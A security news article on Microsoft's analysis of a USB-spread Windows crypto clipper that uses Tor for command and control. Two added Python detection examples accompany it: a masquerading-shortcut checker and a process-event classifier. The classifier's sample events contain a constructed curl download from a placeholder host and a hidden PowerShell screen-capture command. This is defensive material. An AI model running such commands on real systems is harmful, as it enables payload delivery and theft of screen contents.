Microsoft Details Windows Clipper Malware Campaign Using USB LNK Worm and Tor-Based C2


Ravie Lakshmanan | Jun 18, 2026 | Malware / Cryptocurrency

Microsoft has disclosed details of a Windows-based cryptocurrency clipper campaign that has targeted users since February 2026.

“The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command-and-control] server,” the Microsoft Defender Security Research Team said in an analysis published Tuesday. “It carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution.”

“The execution of this clipper is notable because it does not depend on a traditional installer or exposed IP-based C2 infrastructure. Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and blends data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor.”

Clipper malware refers to a type of malicious software that silently monitors a user’s clipboard and intercepts sensitive data copied into that short-term buffer. It primarily targets cryptocurrency transactions: when copied text matches a known blockchain address pattern, the malware swaps in a wallet address under the attackers’ control so that the funds are rerouted to them.

The attacks involve distributing a malicious Windows Shortcut (LNK) file via USB storage devices. Opening the shortcut triggers a worm component that checks whether the machine is already infected and fetches the payload from a remote server only if it is not present. A second module, the clipper, then harvests and exfiltrates cryptocurrency wallet information.

The LNK payload scans the USB device for common document types like DOC, XLSX, and PDF, and if any are found, hides them and creates new LNK files with the same file names whose arguments point to the worm component. Thus, when an unsuspecting user launches the shortcut thinking they are opening a harmless document, they trigger execution of the malware instead.
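A triage check for the masquerading technique described above, written for this article as an added example rather than code from Microsoft or the malware analysis. It takes a directory listing of a removable drive and reports every shortcut whose name mirrors a hidden document, the pattern the worm leaves behind. The listing format, the sample file names and the document-extension set are constructed assumptions; on Windows the `inventory_from_path` helper reads the hidden attribute from `st_file_attributes`, elsewhere it falls back to the dot-file convention.

```python
import os
import stat
from pathlib import PureWindowsPath

# Document types the article names, plus their common siblings (assumption).
DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf"}

# Constructed directory listing of an infected USB stick: the worm has hidden
# the real documents and dropped same-named .lnk files next to them.
SAMPLE_USB_LISTING = [
    {"name": "Q1_report.pdf", "hidden": True},
    {"name": "Q1_report.lnk", "hidden": False},
    {"name": "budget.xlsx", "hidden": True},
    {"name": "budget.xlsx.lnk", "hidden": False},
    {"name": "photos", "hidden": False},
    {"name": "readme.txt", "hidden": False},
    {"name": "notes.docx", "hidden": False},  # visible, no shortcut twin: benign
]


def inventory_from_path(root):
    """Build a listing like SAMPLE_USB_LISTING from a real directory."""
    entries = []
    for entry in os.scandir(root):
        st = entry.stat(follow_symlinks=False)
        # st_file_attributes only exists on Windows; elsewhere treat dot-files as hidden.
        attrs = getattr(st, "st_file_attributes", 0)
        hidden = bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN) or entry.name.startswith(".")
        entries.append({"name": entry.name, "hidden": hidden})
    return entries


def find_masquerading_links(entries):
    """Return (shortcut, hidden_document) pairs where a .lnk shadows a hidden document.

    Both naming variants are matched: 'report.lnk' for 'report.pdf' and
    'report.pdf.lnk' for 'report.pdf'.
    """
    by_stem = {}
    by_name = {}
    for ent in entries:
        path = PureWindowsPath(ent["name"])
        if ent["hidden"] and path.suffix.lower() in DOC_EXTENSIONS:
            by_stem[path.stem.lower()] = ent["name"]
            by_name[path.name.lower()] = ent["name"]

    findings = []
    for ent in entries:
        path = PureWindowsPath(ent["name"])
        if path.suffix.lower() != ".lnk":
            continue
        base = path.name[:-4].lower()  # strip ".lnk"
        twin = by_name.get(base) or by_stem.get(base)
        if twin:
            findings.append((ent["name"], twin))
    return sorted(findings)


if __name__ == "__main__":
    for shortcut, document in find_masquerading_links(SAMPLE_USB_LISTING):
        print(f"suspicious shortcut {shortcut!r} shadows hidden document {document!r}")
```

Only hidden documents are considered, because a shortcut next to a visible file of the same name is an ordinary user habit; tune that rule if your environment never hides documents on removable media. Pair the findings with the shortcut's target and arguments (readable with any LNK parser) before acting on them.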

The worm component, besides ensuring propagation to other uncompromised USB drives, deploys scheduled tasks as a form of persistence for both the worm component and the stealer component. The clipper, for its part, uses WScript and ActiveXObject to interact with the operating system, and exits if Task Manager is among the list of actively running processes to evade detection.

In the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with the external server. Once this step is complete, the malware enters a continuous loop, periodically polling the C2 server for instructions while simultaneously monitoring the clipboard about every 500 milliseconds to extract seed phrases and private keys.

“It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor,” Microsoft said. “If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime.”

The tech giant has recommended that defenders prioritize behavioral detections over static signatures, specifically looking for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables.
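The behavioral detection Microsoft recommends, worked through as an added example that is not part of the article or of Microsoft's published guidance: it classifies process-creation events and flags a script engine (wscript.exe, cscript.exe) spawning curl, cmd.exe, PowerShell or any executable outside an expected set, and separately flags PowerShell command lines that reference a screen-capture API. The event schema and the sample events are constructed (Sysmon-style fields); the `.NET` marker strings used to spot screen capture and the small allowlist of expected children are assumptions to tune per environment.

```python
import ntpath

SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Children a script engine legitimately spawns in this (assumed) environment.
EXPECTED_CHILDREN = {"conhost.exe"}
# Assumption: substrings of the .NET calls PowerShell typically uses to grab the screen.
SCREEN_CAPTURE_MARKERS = ("copyfromscreen", "system.drawing")

# Constructed process-creation events modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3980,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe //B "E:\Q1_report.js"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"curl.exe -s -o C:\Users\u\AppData\Local\Temp\upd.dat http://example.invalid/x"},
    {"pid": 4201, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -w hidden -c Add-Type -AssemblyName System.Drawing; "
                "[System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size)"},
    {"pid": 4310, "ppid": 900,      # benign: logon-script engine started by svchost
     "image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli"},
    {"pid": 4402, "ppid": 3980,     # benign: admin running PowerShell interactively
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell Get-Process"},
]


def basename(path):
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return ntpath.basename(path).lower()


def classify_event(event):
    """Return a list of human-readable reasons this event is suspicious (empty if none)."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmdline = event.get("cmdline", "").lower()
    reasons = []

    if parent in SCRIPT_ENGINES:
        if child in SUSPICIOUS_CHILDREN:
            reasons.append(f"{parent} launched {child}")
        elif child not in EXPECTED_CHILDREN:
            reasons.append(f"{parent} launched unexpected executable {child}")

    if child in POWERSHELL and any(m in cmdline for m in SCREEN_CAPTURE_MARKERS):
        reasons.append("powershell command line references a screen-capture API")

    return reasons


def detect(events):
    """Run classify_event over a stream of events; yields (pid, reason) per finding."""
    return [(ev["pid"], reason) for ev in events for reason in classify_event(ev)]


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The parent/child rule deliberately fires on the relationship, not on the script's path or hash, which is what lets it survive the renamed binaries and rotating payloads the article describes; expect to grow `EXPECTED_CHILDREN` after a few days of baselining, and feed real telemetry (Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled) through `classify_event` rather than the constructed sample.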

Other mitigations include disabling AutoRun/AutoPlay for all removable media, blocking LNK execution from removable drives via Group Policy Objects (GPOs), restricting unnecessary use of wscript.exe or cscript.exe, and reviewing clipboard-related and screen-capture behaviors on devices that handle sensitive financial workflows.
